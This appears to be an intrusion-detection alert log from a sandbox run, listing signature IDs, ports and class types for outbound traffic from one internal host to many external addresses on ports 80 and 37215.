      Timestamp:192.168.2.23194.65.61.8844156802030092 01/26/24-15:32:18.753122
      SID:2030092
      Source Port:44156
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.100.217.16252596802030092 01/26/24-15:32:23.783017
      SID:2030092
      Source Port:52596
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.121.1541622372152829579 01/26/24-15:31:47.813013
      SID:2829579
      Source Port:41622
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23122.116.234.20733582802030092 01/26/24-15:31:51.956820
      SID:2030092
      Source Port:33582
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.47.167.10943070802030092 01/26/24-15:31:58.381828
      SID:2030092
      Source Port:43070
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.113.19652330372152829579 01/26/24-15:31:19.037267
      SID:2829579
      Source Port:52330
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.90.119.1242320802030092 01/26/24-15:32:25.639118
      SID:2030092
      Source Port:42320
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.138.167.14446376802030092 01/26/24-15:31:23.425510
      SID:2030092
      Source Port:46376
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.111.133.23858894802030092 01/26/24-15:32:56.725398
      SID:2030092
      Source Port:58894
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.77.215.3955030802030092 01/26/24-15:31:35.402143
      SID:2030092
      Source Port:55030
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23111.51.104.23142972802030092 01/26/24-15:32:25.692850
      SID:2030092
      Source Port:42972
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.53.176.10136592802030092 01/26/24-15:32:25.792214
      SID:2030092
      Source Port:36592
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.93.247.23160758802030092 01/26/24-15:31:27.233231
      SID:2030092
      Source Port:60758
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.128.201.21958508802030092 01/26/24-15:32:47.668263
      SID:2030092
      Source Port:58508
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.16.125.7852530802030092 01/26/24-15:31:26.836533
      SID:2030092
      Source Port:52530
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.183.233.14441518802030092 01/26/24-15:32:21.506383
      SID:2030092
      Source Port:41518
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.66.222.15547870802025883 01/26/24-15:31:41.789331
      SID:2025883
      Source Port:47870
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2394.120.47.16544676802030092 01/26/24-15:32:46.351289
      SID:2030092
      Source Port:44676
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.77.134.10758310372152829579 01/26/24-15:31:28.507560
      SID:2829579
      Source Port:58310
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2381.198.251.19750352802030092 01/26/24-15:32:06.972423
      SID:2030092
      Source Port:50352
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.183.19.21936238802030092 01/26/24-15:32:15.022014
      SID:2030092
      Source Port:36238
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.42.163.15553414802025883 01/26/24-15:32:42.803741
      SID:2025883
      Source Port:53414
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2384.104.15.14847840802030092 01/26/24-15:33:01.527808
      SID:2030092
      Source Port:47840
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2374.208.140.12337336802025883 01/26/24-15:32:11.570526
      SID:2025883
      Source Port:37336
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.185.224.21638158802025883 01/26/24-15:31:30.592293
      SID:2025883
      Source Port:38158
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23147.154.142.11933900802030092 01/26/24-15:32:58.863656
      SID:2030092
      Source Port:33900
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.119.82.8756146802025883 01/26/24-15:31:16.948086
      SID:2025883
      Source Port:56146
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.66.134.20444984802030092 01/26/24-15:31:55.571417
      SID:2030092
      Source Port:44984
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.220.88.19653468802030092 01/26/24-15:31:55.747068
      SID:2030092
      Source Port:53468
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.12.16259940372152829579 01/26/24-15:33:01.456416
      SID:2829579
      Source Port:59940
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2313.224.63.24341116802030092 01/26/24-15:32:07.797964
      SID:2030092
      Source Port:41116
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.86.0.8042292802030092 01/26/24-15:31:35.809763
      SID:2030092
      Source Port:42292
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.180.233.2255668802025883 01/26/24-15:32:25.279506
      SID:2025883
      Source Port:55668
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.238.9.3533144802030092 01/26/24-15:31:17.425409
      SID:2030092
      Source Port:33144
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.7359358802030092 01/26/24-15:31:22.634380
      SID:2030092
      Source Port:59358
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.79.111.1960996802030092 01/26/24-15:32:33.990530
      SID:2030092
      Source Port:60996
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.169.65.16252674802030092 01/26/24-15:31:58.502198
      SID:2030092
      Source Port:52674
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.69.193.7345732802030092 01/26/24-15:32:29.071266
      SID:2030092
      Source Port:45732
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.35.2.18651384802030092 01/26/24-15:31:30.804139
      SID:2030092
      Source Port:51384
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.38.87.5660742802025883 01/26/24-15:31:18.937002
      SID:2025883
      Source Port:60742
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2314.199.230.22159086802030092 01/26/24-15:31:36.005046
      SID:2030092
      Source Port:59086
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.73.222.13851042802030092 01/26/24-15:31:58.715162
      SID:2030092
      Source Port:51042
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.16.140.12633278802025883 01/26/24-15:32:18.575264
      SID:2025883
      Source Port:33278
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.38.65.23037578802030092 01/26/24-15:33:00.622420
      SID:2030092
      Source Port:37578
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2373.158.248.14835134802030092 01/26/24-15:31:12.643416
      SID:2030092
      Source Port:35134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23196.51.15.16032854802030092 01/26/24-15:32:47.842051
      SID:2030092
      Source Port:32854
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.5.153.17637304802025883 01/26/24-15:31:15.922580
      SID:2025883
      Source Port:37304
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.82.74.11251752802030092 01/26/24-15:32:04.521738
      SID:2030092
      Source Port:51752
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.86.197.21752968802030092 01/26/24-15:32:32.488871
      SID:2030092
      Source Port:52968
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.14.120.4537518802025883 01/26/24-15:31:49.711223
      SID:2025883
      Source Port:37518
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2388.221.24.1056354802030092 01/26/24-15:31:20.588355
      SID:2030092
      Source Port:56354
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.22.248.21839446802025883 01/26/24-15:32:28.382250
      SID:2025883
      Source Port:39446
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2376.164.156.1132940802025883 01/26/24-15:31:01.082396
      SID:2025883
      Source Port:32940
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.165.105.16133670802025883 01/26/24-15:32:01.343654
      SID:2025883
      Source Port:33670
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23164.92.241.13355232802030092 01/26/24-15:32:09.847930
      SID:2030092
      Source Port:55232
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.165.187.10039016802025883 01/26/24-15:33:01.778861
      SID:2025883
      Source Port:39016
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.25.138.5739522802025883 01/26/24-15:31:52.670365
      SID:2025883
      Source Port:39522
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.163.142.12346612802030092 01/26/24-15:33:01.661822
      SID:2030092
      Source Port:46612
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23190.175.16.10033660802025883 01/26/24-15:32:42.003037
      SID:2025883
      Source Port:33660
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.143.148.255194802030092 01/26/24-15:31:41.508143
      SID:2030092
      Source Port:55194
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2383.167.179.936342802025883 01/26/24-15:32:32.574465
      SID:2025883
      Source Port:36342
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.63.87.4949220802030092 01/26/24-15:33:01.955923
      SID:2030092
      Source Port:49220
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23120.78.196.16559336802030092 01/26/24-15:31:13.062668
      SID:2030092
      Source Port:59336
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.243.167.15060322802030092 01/26/24-15:32:15.823027
      SID:2030092
      Source Port:60322
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23193.178.43.2245548802025883 01/26/24-15:32:42.820275
      SID:2025883
      Source Port:45548
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.52.181.2843186802030092 01/26/24-15:31:49.542653
      SID:2030092
      Source Port:43186
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.13.20.12338938802025883 01/26/24-15:31:26.930377
      SID:2025883
      Source Port:38938
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2367.225.246.16446820802025883 01/26/24-15:32:30.553241
      SID:2025883
      Source Port:46820
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.99.247.17737488802025883 01/26/24-15:32:45.240841
      SID:2025883
      Source Port:37488
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23172.103.183.22433132802030092 01/26/24-15:31:41.395483
      SID:2030092
      Source Port:33132
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.169.210.7344226802025883 01/26/24-15:32:56.420174
      SID:2025883
      Source Port:44226
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2344.211.68.17335700802030092 01/26/24-15:31:43.857382
      SID:2030092
      Source Port:35700
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.49.218.22734324802025883 01/26/24-15:31:51.202892
      SID:2025883
      Source Port:34324
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.37.191.14334212802025883 01/26/24-15:32:33.834444
      SID:2025883
      Source Port:34212
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.57.190.2539250802030092 01/26/24-15:31:12.751292
      SID:2030092
      Source Port:39250
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.28.12.20146238802030092 01/26/24-15:32:41.674136
      SID:2030092
      Source Port:46238
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23190.166.87.16747940802025883 01/26/24-15:31:12.177184
      SID:2025883
      Source Port:47940
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23178.242.124.21358878802030092 01/26/24-15:31:58.866499
      SID:2030092
      Source Port:58878
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23222.109.127.9046800802030092 01/26/24-15:32:01.846679
      SID:2030092
      Source Port:46800
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.35.52.6847190802030092 01/26/24-15:32:41.764801
      SID:2030092
      Source Port:47190
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23142.252.201.24755670802030092 01/26/24-15:31:18.623898
      SID:2030092
      Source Port:55670
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.144.178.3158814802030092 01/26/24-15:31:12.317058
      SID:2030092
      Source Port:58814
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.58.6.20547720802030092 01/26/24-15:32:46.232134
      SID:2030092
      Source Port:47720
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23136.243.128.17336892802030092 01/26/24-15:32:04.624562
      SID:2030092
      Source Port:36892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.33.79.19236726802030092 01/26/24-15:31:33.398550
      SID:2030092
      Source Port:36726
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.169.247.8253346802025883 01/26/24-15:31:33.204599
      SID:2025883
      Source Port:53346
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23107.172.253.17556648802025883 01/26/24-15:31:26.762471
      SID:2025883
      Source Port:56648
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.3.88.6154542802030092 01/26/24-15:32:11.576925
      SID:2030092
      Source Port:54542
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.49.33.2453916802030092 01/26/24-15:31:30.578429
      SID:2030092
      Source Port:53916
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.60.196.10654910802025883 01/26/24-15:31:50.047490
      SID:2025883
      Source Port:54910
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.60.235.16253328802025883 01/26/24-15:32:58.656896
      SID:2025883
      Source Port:53328
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.121.355228372152835222 01/26/24-15:31:35.990854
      SID:2835222
      Source Port:55228
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2338.173.86.11947328802025883 01/26/24-15:31:51.388493
      SID:2025883
      Source Port:47328
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.244.93.14353116802025883 01/26/24-15:31:43.590528
      SID:2025883
      Source Port:53116
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.161.34.8042092802030092 01/26/24-15:32:23.795964
      SID:2030092
      Source Port:42092
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.235.130.129.7859124802030092 01/26/24-15:32:41.767636
      SID:2030092
      Source Port:59124
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.165.105.3057168802030092 01/26/24-15:32:38.806869
      SID:2030092
      Source Port:57168
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2386.159.25.10833472802030092 01/26/24-15:32:53.508151
      SID:2030092
      Source Port:33472
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23211.25.120.21259646802030092 01/26/24-15:33:01.663963
      SID:2030092
      Source Port:59646
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353284802025883 01/26/24-15:31:47.591942
      SID:2025883
      Source Port:53284
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2343.248.130.25449038802030092 01/26/24-15:31:18.303147
      SID:2030092
      Source Port:49038
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2395.217.64.1435260802025883 01/26/24-15:31:44.835063
      SID:2025883
      Source Port:35260
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23149.91.88.4733390802030092 01/26/24-15:32:23.589503
      SID:2030092
      Source Port:33390
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.87.80.16555956802030092 01/26/24-15:31:44.820074
      SID:2030092
      Source Port:55956
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23208.69.96.8050392802030092 01/26/24-15:31:23.456047
      SID:2030092
      Source Port:50392
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.47.10.2860276802030092 01/26/24-15:33:01.789275
      SID:2030092
      Source Port:60276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.197.110.5841542802025883 01/26/24-15:32:11.802137
      SID:2025883
      Source Port:41542
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.67.246.15955592802030092 01/26/24-15:32:11.805602
      SID:2030092
      Source Port:55592
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.80.190.13136832802025883 01/26/24-15:31:12.938827
      SID:2025883
      Source Port:36832
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.126.135.9653502802025883 01/26/24-15:31:47.579147
      SID:2025883
      Source Port:53502
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.14.115.11547294802030092 01/26/24-15:32:41.743983
      SID:2030092
      Source Port:47294
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2389.161.183.3245298802030092 01/26/24-15:32:47.933137
      SID:2030092
      Source Port:45298
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.92.41.22753160802030092 01/26/24-15:31:12.833746
      SID:2030092
      Source Port:53160
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23112.192.19.16338874802030092 01/26/24-15:32:18.529901
      SID:2030092
      Source Port:38874
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.142.58.6338674802030092 01/26/24-15:32:30.553653
      SID:2030092
      Source Port:38674
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23223.252.6.2145092802025883 01/26/24-15:32:37.032412
      SID:2025883
      Source Port:45092
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.152.233.16838206802030092 01/26/24-15:31:23.737000
      SID:2030092
      Source Port:38206
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.45.114.19360734802030092 01/26/24-15:32:44.623354
      SID:2030092
      Source Port:60734
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.202.233.18551830802025883 01/26/24-15:31:23.700788
      SID:2025883
      Source Port:51830
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.128.166.8250578802025883 01/26/24-15:32:25.383055
      SID:2025883
      Source Port:50578
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.43.226.25339442802030092 01/26/24-15:32:58.799927
      SID:2030092
      Source Port:39442
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.81.5.20748658802030092 01/26/24-15:31:55.581361
      SID:2030092
      Source Port:48658
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.26.90.11638332802030092 01/26/24-15:31:01.122556
      SID:2030092
      Source Port:38332
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23161.47.33.18353088802030092 01/26/24-15:32:15.824991
      SID:2030092
      Source Port:53088
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.109.60.2139194802030092 01/26/24-15:32:25.609180
      SID:2030092
      Source Port:39194
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23124.198.30.11542388802030092 01/26/24-15:32:09.698068
      SID:2030092
      Source Port:42388
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.22.76.4153952802025883 01/26/24-15:32:12.670692
      SID:2025883
      Source Port:53952
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23135.125.212.234662802030092 01/26/24-15:32:32.808841
      SID:2030092
      Source Port:34662
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2358.27.229.5954696802025883 01/26/24-15:32:18.457147
      SID:2025883
      Source Port:54696
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.94.10647522372152829579 01/26/24-15:32:48.825043
      SID:2829579
      Source Port:47522
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23116.203.0.3550408802025883 01/26/24-15:32:01.763592
      SID:2025883
      Source Port:50408
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2386.22.49.25350780802025883 01/26/24-15:32:21.592093
      SID:2025883
      Source Port:50780
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.221.252.5251938802030092 01/26/24-15:32:32.832220
      SID:2030092
      Source Port:51938
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.126.118.10247338802025883 01/26/24-15:31:01.582991
      SID:2025883
      Source Port:47338
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23221.194.131.8758524802025883 01/26/24-15:31:41.925411
      SID:2025883
      Source Port:58524
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.254.67.20558516372152829579 01/26/24-15:31:52.465785
      SID:2829579
      Source Port:58516
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23119.45.129.20653114802030092 01/26/24-15:32:25.279467
      SID:2030092
      Source Port:53114
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.165.59.19938728802025883 01/26/24-15:32:01.702335
      SID:2025883
      Source Port:38728
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2393.193.221.12535076802025883 01/26/24-15:32:19.779362
      SID:2025883
      Source Port:35076
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2385.192.198.14541010802030092 01/26/24-15:32:11.645204
      SID:2030092
      Source Port:41010
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353014802025883 01/26/24-15:31:41.558394
      SID:2025883
      Source Port:53014
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.107.149.20444228802025883 01/26/24-15:31:47.457328
      SID:2025883
      Source Port:44228
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2364.68.224.6848616802030092 01/26/24-15:31:55.514444
      SID:2030092
      Source Port:48616
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.145.232.19832932802030092 01/26/24-15:31:18.095689
      SID:2030092
      Source Port:32932
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23147.46.47.20155390802030092 01/26/24-15:31:44.866076
      SID:2030092
      Source Port:55390
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2389.232.184.7048042802025883 01/26/24-15:32:12.076459
      SID:2025883
      Source Port:48042
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2373.223.88.24932972802030092 01/26/24-15:31:16.960028
      SID:2030092
      Source Port:32972
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.9.223.3838386802030092 01/26/24-15:33:02.010793
      SID:2030092
      Source Port:38386
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.24.247.1654216802025883 01/26/24-15:32:42.593097
      SID:2025883
      Source Port:54216
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.194.29.14435718802025883 01/26/24-15:31:17.004706
      SID:2025883
      Source Port:35718
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23123.56.30.12146802802025883 01/26/24-15:31:52.000684
      SID:2025883
      Source Port:46802
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23149.202.117.7637802802030092 01/26/24-15:31:12.472984
      SID:2030092
      Source Port:37802
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2314.245.88.10533686802030092 01/26/24-15:32:34.039201
      SID:2030092
      Source Port:33686
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.7.93.3850156802025883 01/26/24-15:31:55.485744
      SID:2025883
      Source Port:50156
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.38.124.18233456802030092 01/26/24-15:32:19.617457
      SID:2030092
      Source Port:33456
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.202.252.17459934802030092 01/26/24-15:32:30.867097
      SID:2030092
      Source Port:59934
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.202.54.2452170802030092 01/26/24-15:33:01.962315
      SID:2030092
      Source Port:52170
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.133.20.854662802025883 01/26/24-15:32:19.590376
      SID:2025883
      Source Port:54662
      Destination Port:80
      Protocol:TCP
